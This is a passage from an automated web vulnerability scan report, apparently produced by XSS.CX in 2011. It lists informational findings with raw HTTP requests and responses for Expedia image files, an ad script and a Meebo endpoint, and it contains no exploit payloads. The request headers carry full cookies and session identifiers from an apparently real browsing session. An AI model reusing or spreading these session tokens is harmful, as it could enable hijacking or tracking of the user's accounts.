bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:10 GMT
Pragma: no-cache
Content-Length: 4586
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

27.2. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Request

Response

27.3. http://www.expedia.com/static/default/default/images/close_button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/images/close_button.gif

Request

GET /static/default/default/images/close_button.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"73-1306934938467"
Last-Modified: Wed, 01 Jun 2011 13:28:58 GMT
Content-Length: 73
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

GIF89a...................!.......,...........T.i. . z.2j.ngk,MO7...-.P..;

27.4. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/hotel_detail_rating_bar.gif

Request

GET /static/default/default/images/infosite/hotel_detail_rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"448-1306934873248"
Last-Modified: Wed, 01 Jun 2011 13:27:53 GMT
Content-Length: 448
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89a:..............'.....
..........._..r..9..L....._..L..9..s........ ..r..8..K..8..K..`..&..s.....`......!.......,....:......` .di.h..@..p,.t.@.Kz/....'..
?!...-.8C.@.R..t;.^#[..J.^..[.0.p..6...
...[SNIP]...

27.5. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/icn_quote_beak_down.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_down.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1185-1306934923821"
Last-Modified: Wed, 01 Jun 2011 13:28:43 GMT
Content-Length: 1185
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...

27.6. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/icn_quote_beak_up.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_up.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1182-1306934928887"
Last-Modified: Wed, 01 Jun 2011 13:28:48 GMT
Content-Length: 1182
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...

27.7. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/rating_bar.gif

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1306934969334"
Last-Modified: Wed, 01 Jun 2011 13:29:29 GMT
Content-Length: 1348
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61
...[SNIP]...

27.8. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/default/default/images/infosite/videoPlayLarge.gif

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1306934815898"
Last-Modified: Wed, 01 Jun 2011 13:26:55 GMT
Content-Length: 1275
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...

27.9. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/fusion/v2.3/images/buttonBG.png

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1636-1306934901311"
Last-Modified: Wed, 01 Jun 2011 13:28:21 GMT
Content-Length: 1636
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...,...S.............tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

27.10. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"3834-1306934880566"
Last-Modified: Wed, 01 Jun 2011 13:28:00 GMT
Content-Length: 3834
Date: Mon, 13 Jun 2011 11:20:35 GMT
Connection: close

.PNG
.
...IHDR..............q.~....gAMA......a.....PLTE...333.5]......................................................................................................................................
...[SNIP]...

27.11. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/static/fusion/v2.3/images/iconsSprites.png

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"10346-1306932030475"
Last-Modified: Wed, 01 Jun 2011 12:40:30 GMT
Content-Length: 10346
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...i..........wYA....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

27.12. http://www.meebo.com/cmd/tc previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meebo.com
Path:	/cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
Content-Length: 94
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meebo-cim-session=392f47c54ef0da7dcabb; bcookie=2f6053a27fe3b8a2e635; tcookie=205b6e881dec26d8ff51%26false

canopy=true&tc=true&bcookie=2f6053a27fe3b8a2e635&tcookie=205b6e881dec26d8ff51&partner=fansided

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:01:34 GMT
Connection: keep-alive
Content-Length: 118

{"stat": "ok", "data": {"tcookie": "205b6e881dec26d8ff51", "canopy": {"enabled": false}, "categories": {"ic13": "1"}}}

Report generated by XSS.CX at Mon Jun 13 08:12:03 CDT 2011.